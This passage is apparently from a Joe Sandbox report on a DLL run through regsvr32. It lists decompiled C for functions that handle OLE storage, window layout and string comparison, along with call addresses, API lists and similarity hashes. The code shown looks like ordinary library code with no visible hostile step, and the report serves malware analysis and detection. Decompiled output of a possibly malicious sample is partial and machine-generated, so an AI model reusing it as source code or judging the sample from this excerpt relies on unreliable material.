                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,00000000,10012C1E,00000000,00000000,10042730,0000001C,1001294D,00000001,00000020,00000100,?,00000000), ref: 100184D5
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,00000000,10012C1E,?,00000000), ref: 10018553
                                                                                                            • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 10018565
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiStringTypeWide$ErrorLast
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 3581945363-4125583295
                                                                                                            • Opcode ID: c5b59c8c516efa9e1f4051a0dd57c54a1c21c008c676a274ba4cfa4b85049daa
                                                                                                            • Instruction ID: 357f909d61fdf3067703904fdff93fde9d84214a81f0f6dffe892fe1b28005b1
                                                                                                            • Opcode Fuzzy Hash: c5b59c8c516efa9e1f4051a0dd57c54a1c21c008c676a274ba4cfa4b85049daa
                                                                                                            • Instruction Fuzzy Hash: D2418071900629ABEB12CF60CC85A9E3BA6FF497A0F114108F810EE191D735DF91DBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000B89E Relevance: 12.3, APIs: 8, Instructions: 303memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 71%
                                                                                                            			E1000B89E(intOrPtr __ecx) {
				void* _t115;
				intOrPtr _t119;
				intOrPtr* _t120;
				void* _t121;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr* _t126;
				void _t128;
				intOrPtr* _t130;
				long _t133;
				void* _t134;
				void* _t135;
				void* _t136;
				void _t138;
				void _t140;
				void* _t142;
				void* _t143;
				void* _t146;
				void* _t147;
				void _t148;
				void* _t150;
				intOrPtr* _t152;
				void* _t153;
				void _t157;
				void* _t158;
				void _t160;
				intOrPtr* _t162;
				void* _t167;
				intOrPtr* _t169;
				intOrPtr* _t171;
				intOrPtr* _t173;
				void* _t174;
				intOrPtr* _t176;
				intOrPtr _t187;
				intOrPtr* _t207;
				void* _t211;
				void* _t226;
				void* _t227;
				void* _t228;

				E10011BF0(0x1003aeb1, _t228);
				_t176 = __ecx + 0x4c;
				 *((intOrPtr*)(_t228 - 0x20)) = __ecx;
				_t115 = E1000A2B0(__ecx,  *((intOrPtr*)(_t228 + 8)), 0, 3, 0x10043068, _t176,  *(_t228 + 0x14));
				 *(_t228 + 0x14) = _t115;
				if(_t115 < 0) {
					L51:
					 *[fs:0x0] =  *((intOrPtr*)(_t228 - 0xc));
					return _t115;
				}
				 *(_t228 - 0x10) = 0;
				 *(_t228 - 0x14) = 0;
				 *((intOrPtr*)(_t228 + 8)) = 0;
				E1000A4B6(__ecx, __ecx + 0x3c);
				_t119 =  *((intOrPtr*)( *((intOrPtr*)(__ecx)) + 0xc0))();
				 *((intOrPtr*)(_t228 - 0x24)) = _t119;
				if(_t119 != 0) {
					L4:
					_t226 =  *(_t228 + 0xc);
					if(_t226 == 0) {
						__eflags =  *(_t228 + 0x10);
						if( *(_t228 + 0x10) != 0) {
							L15:
							_t120 =  *_t176;
							_t211 = _t228 - 0x14;
							_t121 =  *((intOrPtr*)( *_t120))(_t120, 0x100430e8, _t211);
							__eflags = _t121;
							if(_t121 < 0) {
								L42:
								if( *(_t228 + 0x14) >= 0) {
									L45:
									_t122 =  *((intOrPtr*)(_t228 + 8));
									if(_t122 != 0) {
										 *((intOrPtr*)( *_t122 + 8))(_t122);
									}
									if( *((intOrPtr*)(_t228 - 0x24)) != 0 &&  *(_t228 + 0x14) >= 0) {
										 *(_t228 + 0x14) = 1;
									}
									_t115 =  *(_t228 + 0x14);
									goto L51;
								}
								L43:
								_t124 =  *_t176;
								if(_t124 != 0) {
									 *((intOrPtr*)( *_t124 + 0x18))(_t124, 1);
									_t126 =  *_t176;
									 *((intOrPtr*)( *_t126 + 8))(_t126);
									 *_t176 = 0;
								}
								goto L45;
							}
							__eflags = _t226;
							if(_t226 != 0) {
								__eflags =  *(_t228 + 0x10);
								if( *(_t228 + 0x10) == 0) {
									 *(_t228 + 0x14) = 0x8000ffff;
									L36:
									_t128 =  *(_t228 - 0x14);
									L37:
									 *((intOrPtr*)( *_t128 + 8))(_t128);
									L38:
									if( *(_t228 + 0x14) < 0) {
										goto L43;
									}
									if( *((intOrPtr*)(_t228 - 0x24)) == 0) {
										_t187 =  *((intOrPtr*)(_t228 - 0x20));
										if(( *(_t187 + 0x6e) & 0x00000002) == 0) {
											_t130 =  *_t176;
											 *(_t228 + 0x14) =  *((intOrPtr*)( *_t130 + 0xc))(_t130, _t187 + 0xc4);
										}
									}
									goto L42;
								}
								_t133 =  *((intOrPtr*)( *_t226 + 0x30))();
								__eflags = _t211;
								 *(_t228 - 0x2c) = _t133;
								if(__eflags > 0) {
									L29:
									 *(_t228 + 0x14) = 0x8007000e;
									 *(_t228 + 0x10) = 0;
									L30:
									__eflags =  *(_t228 + 0x10);
									 *(_t228 - 0x1c) = 0;
									if( *(_t228 + 0x10) == 0) {
										goto L36;
									}
									_t134 = _t228 - 0x1c;
									__imp__CreateILockBytesOnHGlobal( *(_t228 + 0x10), 1, _t134);
									__eflags = _t134;
									 *(_t228 + 0x14) = _t134;
									if(_t134 < 0) {
										goto L36;
									}
									_t135 = _t228 - 0x18;
									 *(_t228 - 0x18) = 0;
									__imp__StgOpenStorageOnILockBytes( *(_t228 - 0x1c), 0, 0x12, 0, 0, _t135);
									__eflags = _t135;
									 *(_t228 + 0x14) = _t135;
									if(_t135 >= 0) {
										_t138 =  *(_t228 - 0x14);
										 *(_t228 + 0x14) =  *((intOrPtr*)( *_t138 + 0x18))(_t138,  *(_t228 - 0x18));
										_t140 =  *(_t228 - 0x18);
										 *((intOrPtr*)( *_t140 + 8))(_t140);
									}
									_t136 =  *(_t228 - 0x1c);
									L21:
									 *((intOrPtr*)( *_t136 + 8))(_t136);
									goto L36;
								}
								if(__eflags < 0) {
									L26:
									_t142 = GlobalAlloc(0, _t133);
									__eflags = _t142;
									 *(_t228 + 0x10) = _t142;
									if(_t142 == 0) {
										goto L29;
									}
									_t143 = GlobalLock(_t142);
									__eflags = _t143;
									if(_t143 == 0) {
										goto L29;
									}
									 *((intOrPtr*)( *_t226 + 0x34))(_t143,  *(_t228 - 0x2c));
									GlobalUnlock( *(_t228 + 0x10));
									goto L30;
								}
								__eflags = _t133 - 0xffffffff;
								if(_t133 >= 0xffffffff) {
									goto L29;
								}
								goto L26;
							}
							_t146 = _t228 + 0xc;
							 *(_t228 + 0xc) = 0;
							__imp__CreateILockBytesOnHGlobal(0, 1, _t146);
							__eflags = _t146;
							 *(_t228 + 0x14) = _t146;
							if(_t146 < 0) {
								goto L36;
							}
							_t147 = _t228 + 0x10;
							 *(_t228 + 0x10) = 0;
							__imp__StgCreateDocfileOnILockBytes( *(_t228 + 0xc), 0x1012, 0, _t147);
							__eflags = _t147;
							 *(_t228 + 0x14) = _t147;
							if(_t147 >= 0) {
								_t148 =  *(_t228 - 0x14);
								 *(_t228 + 0x14) =  *((intOrPtr*)( *_t148 + 0x14))(_t148,  *(_t228 + 0x10));
								_t150 =  *(_t228 + 0x10);
								 *((intOrPtr*)( *_t150 + 8))(_t150);
							}
							_t136 =  *(_t228 + 0xc);
							goto L21;
						}
						L10:
						_t152 =  *_t176;
						_t214 = _t228 - 0x10;
						_t153 =  *((intOrPtr*)( *_t152))(_t152, 0x10043188, _t228 - 0x10);
						__eflags = _t153;
						if(_t153 < 0) {
							goto L15;
						} else {
							__eflags = _t226;
							if(__eflags != 0) {
								E1002A986(_t228 - 0x74, _t214, __eflags);
								 *(_t228 - 4) = 0;
								E1001D6AF(_t228 - 0x2c, _t228 - 0x74);
								_t157 =  *(_t228 - 0x10);
								_t158 =  *((intOrPtr*)( *_t157 + 0x14))(_t157, _t228 - 0x2c, _t226, 1, 0x1000, 0);
								_t46 = _t228 - 4;
								 *_t46 =  *(_t228 - 4) | 0xffffffff;
								__eflags =  *_t46;
								 *(_t228 + 0x14) = _t158;
								E1002A941(_t228 - 0x74, _t228 - 0x2c);
							} else {
								_t160 =  *(_t228 - 0x10);
								 *(_t228 + 0x14) =  *((intOrPtr*)( *_t160 + 0x20))(_t160);
							}
							_t128 =  *(_t228 - 0x10);
							goto L37;
						}
					}
					if( *(_t228 + 0x10) != 0) {
						goto L15;
					}
					_t162 =  *_t176;
					_push(_t228 + 8);
					_push(0x10043198);
					_push(_t162);
					if( *((intOrPtr*)( *_t162))() < 0) {
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(3);
					if( *((intOrPtr*)( *_t226 + 0x50))() == 0) {
						goto L10;
					} else {
						 *(_t228 + 0x10) = 0;
						_t167 =  *((intOrPtr*)( *_t226 + 0x50))(0, 0xffffffff, _t228 + 0x10, _t228 + 0xc);
						_t207 =  *((intOrPtr*)(_t228 + 8));
						 *(_t228 + 0x14) =  *((intOrPtr*)( *_t207 + 0x14))(_t207,  *(_t228 + 0x10), _t167);
						_t169 =  *((intOrPtr*)(_t228 + 8));
						 *((intOrPtr*)( *_t169 + 8))(_t169);
						 *((intOrPtr*)(_t228 + 8)) = 0;
						goto L38;
					}
				}
				_t171 =  *_t176;
				_t227 = __ecx + 0x6c;
				 *((intOrPtr*)( *_t171 + 0x58))(_t171, 1, _t227);
				if(( *(_t227 + 2) & 0x00000002) == 0) {
					goto L4;
				}
				_t173 =  *_t176;
				_t174 =  *((intOrPtr*)( *_t173 + 0xc))(_t173,  *((intOrPtr*)(_t228 - 0x20)) + 0xc4);
				 *(_t228 + 0x14) = _t174;
				if(_t174 < 0) {
					goto L43;
				}
				goto L4;
			}










































                                                                                                            0x1000b8a3
                                                                                                            0x1000b8b3
                                                                                                            0x1000b8c4
                                                                                                            0x1000b8c7
                                                                                                            0x1000b8ce
                                                                                                            0x1000b8d1
                                                                                                            0x1000bba5
                                                                                                            0x1000bbab
                                                                                                            0x1000bbb3
                                                                                                            0x1000bbb3
                                                                                                            0x1000b8dd
                                                                                                            0x1000b8e0
                                                                                                            0x1000b8e3
                                                                                                            0x1000b8e6
                                                                                                            0x1000b8ef
                                                                                                            0x1000b8f7
                                                                                                            0x1000b8fa
                                                                                                            0x1000b92d
                                                                                                            0x1000b92d
                                                                                                            0x1000b932
                                                                                                            0x1000b997
                                                                                                            0x1000b99a
                                                                                                            0x1000ba06
                                                                                                            0x1000ba06
                                                                                                            0x1000ba0a
                                                                                                            0x1000ba14
                                                                                                            0x1000ba16
                                                                                                            0x1000ba18
                                                                                                            0x1000bb67
                                                                                                            0x1000bb6a
                                                                                                            0x1000bb84
                                                                                                            0x1000bb84
                                                                                                            0x1000bb89
                                                                                                            0x1000bb8e
                                                                                                            0x1000bb8e
                                                                                                            0x1000bb94
                                                                                                            0x1000bb9b
                                                                                                            0x1000bb9b
                                                                                                            0x1000bba2
                                                                                                            0x00000000
                                                                                                            0x1000bba2
                                                                                                            0x1000bb6c
                                                                                                            0x1000bb6c
                                                                                                            0x1000bb70
                                                                                                            0x1000bb77
                                                                                                            0x1000bb7a
                                                                                                            0x1000bb7f
                                                                                                            0x1000bb82
                                                                                                            0x1000bb82
                                                                                                            0x00000000
                                                                                                            0x1000bb70
                                                                                                            0x1000ba1e
                                                                                                            0x1000ba20
                                                                                                            0x1000ba80
                                                                                                            0x1000ba83
                                                                                                            0x1000bb32
                                                                                                            0x1000bb39
                                                                                                            0x1000bb39
                                                                                                            0x1000bb3c
                                                                                                            0x1000bb3f
                                                                                                            0x1000bb42
                                                                                                            0x1000bb45
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000bb4a
                                                                                                            0x1000bb4c
                                                                                                            0x1000bb53
                                                                                                            0x1000bb55
                                                                                                            0x1000bb64
                                                                                                            0x1000bb64
                                                                                                            0x1000bb53
                                                                                                            0x00000000
                                                                                                            0x1000bb4a
                                                                                                            0x1000ba8d
                                                                                                            0x1000ba90
                                                                                                            0x1000ba92
                                                                                                            0x1000ba95
                                                                                                            0x1000bace
                                                                                                            0x1000bace
                                                                                                            0x1000bad5
                                                                                                            0x1000bad8
                                                                                                            0x1000bad8
                                                                                                            0x1000badb
                                                                                                            0x1000bade
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000bae0
                                                                                                            0x1000bae9
                                                                                                            0x1000baef
                                                                                                            0x1000baf1
                                                                                                            0x1000baf4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000baf6
                                                                                                            0x1000bb02
                                                                                                            0x1000bb05
                                                                                                            0x1000bb0b
                                                                                                            0x1000bb0d
                                                                                                            0x1000bb10
                                                                                                            0x1000bb12
                                                                                                            0x1000bb1e
                                                                                                            0x1000bb21
                                                                                                            0x1000bb27
                                                                                                            0x1000bb27
                                                                                                            0x1000bb2a
                                                                                                            0x1000ba75
                                                                                                            0x1000ba78
                                                                                                            0x00000000
                                                                                                            0x1000ba78
                                                                                                            0x1000ba97
                                                                                                            0x1000ba9e
                                                                                                            0x1000baa0
                                                                                                            0x1000baa6
                                                                                                            0x1000baa8
                                                                                                            0x1000baab
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000baae
                                                                                                            0x1000bab4
                                                                                                            0x1000bab6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000bac0
                                                                                                            0x1000bac6
                                                                                                            0x00000000
                                                                                                            0x1000bac6
                                                                                                            0x1000ba99
                                                                                                            0x1000ba9c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000ba9c
                                                                                                            0x1000ba22
                                                                                                            0x1000ba29
                                                                                                            0x1000ba2c
                                                                                                            0x1000ba32
                                                                                                            0x1000ba34
                                                                                                            0x1000ba37
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000ba3d
                                                                                                            0x1000ba4a
                                                                                                            0x1000ba4d
                                                                                                            0x1000ba53
                                                                                                            0x1000ba55
                                                                                                            0x1000ba58
                                                                                                            0x1000ba5a
                                                                                                            0x1000ba66
                                                                                                            0x1000ba69
                                                                                                            0x1000ba6f
                                                                                                            0x1000ba6f
                                                                                                            0x1000ba72
                                                                                                            0x00000000
                                                                                                            0x1000ba72
                                                                                                            0x1000b99c
                                                                                                            0x1000b99c
                                                                                                            0x1000b9a0
                                                                                                            0x1000b9aa
                                                                                                            0x1000b9ac
                                                                                                            0x1000b9ae
                                                                                                            0x00000000
                                                                                                            0x1000b9b0
                                                                                                            0x1000b9b0
                                                                                                            0x1000b9b2
                                                                                                            0x1000b9ce
                                                                                                            0x1000b9da
                                                                                                            0x1000b9dd
                                                                                                            0x1000b9e2
                                                                                                            0x1000b9ec
                                                                                                            0x1000b9ef
                                                                                                            0x1000b9ef
                                                                                                            0x1000b9ef
                                                                                                            0x1000b9f6
                                                                                                            0x1000b9f9
                                                                                                            0x1000b9b4
                                                                                                            0x1000b9b4
                                                                                                            0x1000b9bd
                                                                                                            0x1000b9bd
                                                                                                            0x1000b9fe
                                                                                                            0x00000000
                                                                                                            0x1000b9fe
                                                                                                            0x1000b9ae
                                                                                                            0x1000b937
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000b93d
                                                                                                            0x1000b944
                                                                                                            0x1000b945
                                                                                                            0x1000b94a
                                                                                                            0x1000b94f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000b953
                                                                                                            0x1000b954
                                                                                                            0x1000b955
                                                                                                            0x1000b956
                                                                                                            0x1000b95f
                                                                                                            0x00000000
                                                                                                            0x1000b961
                                                                                                            0x1000b970
                                                                                                            0x1000b973
                                                                                                            0x1000b976
                                                                                                            0x1000b983
                                                                                                            0x1000b986
                                                                                                            0x1000b98c
                                                                                                            0x1000b98f
                                                                                                            0x00000000
                                                                                                            0x1000b98f
                                                                                                            0x1000b95f
                                                                                                            0x1000b8fc
                                                                                                            0x1000b900
                                                                                                            0x1000b907
                                                                                                            0x1000b90e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000b913
                                                                                                            0x1000b91f
                                                                                                            0x1000b924
                                                                                                            0x1000b927
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 1000B8A3
                                                                                                              • Part of subcall function 1000A2B0: CoGetClassObject.OLE32(?,?,00000000,100430A8,?), ref: 1000A2D0
                                                                                                              • Part of subcall function 1002A986: __EH_prolog.LIBCMT ref: 1002A98B
                                                                                                              • Part of subcall function 1002A941: __EH_prolog.LIBCMT ref: 1002A946
                                                                                                            • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 1000BA2C
                                                                                                            • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 1000BA4D
                                                                                                            • GlobalAlloc.KERNEL32(00000000,00000000), ref: 1000BAA0
                                                                                                            • GlobalLock.KERNEL32 ref: 1000BAAE
                                                                                                            • GlobalUnlock.KERNEL32(?), ref: 1000BAC6
                                                                                                            • CreateILockBytesOnHGlobal.OLE32(?,00000001,?), ref: 1000BAE9
                                                                                                            • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 1000BB05
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: GlobalLock$Bytes$CreateH_prolog$AllocClassDocfileObjectOpenStorageUnlock
                                                                                                            • String ID:
                                                                                                            • API String ID: 645133905-0
                                                                                                            • Opcode ID: 185fddf691f165cf246ba28c1c06a3726dabc5333d542278f897f997fcb1b7b0
                                                                                                            • Instruction ID: 4fa0019427ba4cc32ee59eeb07c1e68fe65e84f71fb64a57669587eeb3e16f8a
                                                                                                            • Opcode Fuzzy Hash: 185fddf691f165cf246ba28c1c06a3726dabc5333d542278f897f997fcb1b7b0
                                                                                                            • Instruction Fuzzy Hash: 73C16A70A0064AEFDB11CF64C888DAEBBB9FF89780B204559F941EB265C771DD41CB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10022499 Relevance: 12.1, APIs: 8, Instructions: 124windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 87%
                                                                                                            			E10022499(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, signed char _a17, struct tagRECT* _a20, signed int _a24, intOrPtr _a28) {
				int _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagRECT _v36;
				void* _v40;
				void* __ebp;
				signed int _t61;
				int _t62;
				signed short _t63;
				void* _t64;
				void* _t72;
				intOrPtr* _t85;
				signed int _t87;
				struct HWND__* _t91;
				void* _t92;

				_t72 = __ecx;
				_v8 = 0;
				_v12 = _a28;
				_v16 = 0;
				_v20 = 0;
				if(_a24 == 0) {
					GetClientRect( *(__ecx + 0x1c),  &_v36);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				_t61 = _a16 & 0xffff7fff;
				_a24 = _t61;
				if(_t61 == 1) {
					_v40 = _v40 & 0x00000000;
				} else {
					_v40 = BeginDeferWindowPos(8);
				}
				_t62 = GetTopWindow( *(_t72 + 0x1c));
				while(1) {
					_t91 = _t62;
					if(_t91 == 0) {
						break;
					}
					_t63 = GetDlgCtrlID(_t91);
					_push(_t91);
					_t87 = _t63 & 0x0000ffff;
					_t64 = E10022115();
					if(_t87 != _a12) {
						if(_t87 >= _a4 && _t87 <= _a8 && _t64 != 0) {
							SendMessageA(_t91, 0x361, 0,  &_v40);
						}
					} else {
						_v8 = _t91;
					}
					_t62 = GetWindow(_t91, 2);
				}
				if(_a24 != 1) {
					if(_a12 != 0 && _v8 != 0) {
						_t62 = E100220EE(_t92, _v8);
						if(_a24 == 2) {
							_t85 = _a20;
							_v36.left = _v36.left +  *_t85;
							_v36.top = _v36.top +  *((intOrPtr*)(_t85 + 4));
							_v36.right = _v36.right -  *((intOrPtr*)(_t85 + 8));
							_v36.bottom = _v36.bottom -  *((intOrPtr*)(_t85 + 0xc));
						}
						if((_a17 & 0x00000080) == 0) {
							 *((intOrPtr*)( *_t62 + 0x68))( &_v36, 0);
							_t62 = E10020D81( &_v40, _v8,  &_v36);
						}
					}
					if(_v40 != 0) {
						_t62 = EndDeferWindowPos(_v40);
					}
				} else {
					if(_a28 == 0) {
						_t62 = _a20;
						 *((intOrPtr*)(_t62 + 8)) = _v20;
						 *((intOrPtr*)(_t62 + 4)) = 0;
						 *_t62 = 0;
						 *((intOrPtr*)(_t62 + 0xc)) = _v16;
					} else {
						_t62 = CopyRect(_a20,  &_v36);
					}
				}
				return _t62;
			}



















                                                                                                            0x100224a8
                                                                                                            0x100224ae
                                                                                                            0x100224b1
                                                                                                            0x100224b4
                                                                                                            0x100224b7
                                                                                                            0x100224ba
                                                                                                            0x100224cc
                                                                                                            0x100224bc
                                                                                                            0x100224bf
                                                                                                            0x100224c0
                                                                                                            0x100224c1
                                                                                                            0x100224c2
                                                                                                            0x100224c2
                                                                                                            0x100224d5
                                                                                                            0x100224dd
                                                                                                            0x100224e0
                                                                                                            0x100224ef
                                                                                                            0x100224e2
                                                                                                            0x100224ea
                                                                                                            0x100224ea
                                                                                                            0x100224f6
                                                                                                            0x10022542
                                                                                                            0x10022542
                                                                                                            0x10022546
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10022501
                                                                                                            0x10022507
                                                                                                            0x10022508
                                                                                                            0x1002250b
                                                                                                            0x10022513
                                                                                                            0x1002251d
                                                                                                            0x10022533
                                                                                                            0x10022533
                                                                                                            0x10022515
                                                                                                            0x10022515
                                                                                                            0x10022515
                                                                                                            0x1002253c
                                                                                                            0x1002253c
                                                                                                            0x1002254c
                                                                                                            0x1002257b
                                                                                                            0x10022585
                                                                                                            0x1002258e
                                                                                                            0x10022590
                                                                                                            0x10022595
                                                                                                            0x1002259b
                                                                                                            0x100225a1
                                                                                                            0x100225a7
                                                                                                            0x100225a7
                                                                                                            0x100225ae
                                                                                                            0x100225b9
                                                                                                            0x100225c7
                                                                                                            0x100225c7
                                                                                                            0x100225ae
                                                                                                            0x100225cf
                                                                                                            0x100225d4
                                                                                                            0x100225d4
                                                                                                            0x1002254e
                                                                                                            0x10022551
                                                                                                            0x10022562
                                                                                                            0x10022568
                                                                                                            0x1002256e
                                                                                                            0x10022571
                                                                                                            0x10022573
                                                                                                            0x10022553
                                                                                                            0x1002255a
                                                                                                            0x1002255a
                                                                                                            0x10022551
                                                                                                            0x100225de

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$DeferRect$BeginClientCopyCtrlMessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 1228040700-0
                                                                                                            • Opcode ID: 42fbaed3706ff63598f5f0fcd2255645fe957362c4a3063a48a191e489ec859f
                                                                                                            • Instruction ID: a778dc46a9958f4d0915ef63e23ed223fa2105f0a807d6ecff0719afcf2b0a04
                                                                                                            • Opcode Fuzzy Hash: 42fbaed3706ff63598f5f0fcd2255645fe957362c4a3063a48a191e489ec859f
                                                                                                            • Instruction Fuzzy Hash: D741477190062AEFCF11DFD4E8A49EEB7B5FF08340B51816AF905A7251C734AA50CFA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002535C Relevance: 12.1, APIs: 8, Instructions: 81stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1002535C(void* __ebx, void* __edi, void* __esi, char* _a4, CHAR* _a8) {
				intOrPtr _v8;
				short _v528;
				short _v1048;
				short _v1568;
				intOrPtr _t18;
				int _t20;
				int _t21;
				void* _t23;
				char* _t32;
				int _t37;
				char* _t42;
				void* _t47;
				void* _t49;

				_t18 =  *0x1004c470; // 0xf3933a06
				_t42 = _a4;
				_v8 = _t18;
				if(lstrcmpiA(_t42, _a8) == 0) {
					_t20 = GetSystemMetrics(0x2a);
					if(_t20 != 0) {
						_t21 = lstrlenA(_t42);
						if(_t21 != lstrlenA(_a8)) {
							L13:
							_t23 = 0;
						} else {
							_t37 = GetThreadLocale();
							GetStringTypeA(_t37, 1, _t42, 0xffffffff,  &_v528);
							GetStringTypeA(_t37, 4, _t42, 0xffffffff,  &_v1048);
							GetStringTypeA(_t37, 1, _a8, 0xffffffff,  &_v1568);
							_t32 = _t42;
							if( *_t42 == 0) {
								L10:
								_t23 = 1;
							} else {
								_t47 = 0;
								while(( *(_t49 + _t47 - 0x414) & 0x00000080) == 0 ||  *((intOrPtr*)(_t49 + _t47 - 0x20c)) ==  *((intOrPtr*)(_t49 + _t47 - 0x61c))) {
									_t47 = _t47 + 2;
									if( *_t32 != 0) {
										continue;
									} else {
										goto L10;
									}
									goto L11;
								}
								goto L13;
							}
						}
						L11:
					} else {
						_t23 = _t20 + 1;
					}
				} else {
					_t23 = 0;
				}
				return E100117AE(_t23, _v8);
			}
















                                                                                                            0x10025365
                                                                                                            0x1002536e
                                                                                                            0x10025372
                                                                                                            0x1002537d
                                                                                                            0x10025388
                                                                                                            0x10025390
                                                                                                            0x100253a1
                                                                                                            0x100253ac
                                                                                                            0x10025434
                                                                                                            0x10025434
                                                                                                            0x100253b2
                                                                                                            0x100253be
                                                                                                            0x100253cd
                                                                                                            0x100253dc
                                                                                                            0x100253ed
                                                                                                            0x100253f2
                                                                                                            0x100253f4
                                                                                                            0x10025422
                                                                                                            0x10025424
                                                                                                            0x100253f6
                                                                                                            0x100253f6
                                                                                                            0x100253f8
                                                                                                            0x10025416
                                                                                                            0x10025420
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10025420
                                                                                                            0x00000000
                                                                                                            0x100253f8
                                                                                                            0x100253f4
                                                                                                            0x10025425
                                                                                                            0x10025392
                                                                                                            0x10025392
                                                                                                            0x10025392
                                                                                                            0x1002537f
                                                                                                            0x1002537f
                                                                                                            0x1002537f
                                                                                                            0x10025431

                                                                                                            APIs
                                                                                                            • lstrcmpiA.KERNEL32(?,00000000), ref: 10025375
                                                                                                            • GetSystemMetrics.USER32 ref: 10025388
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MetricsSystemlstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 2335526769-0
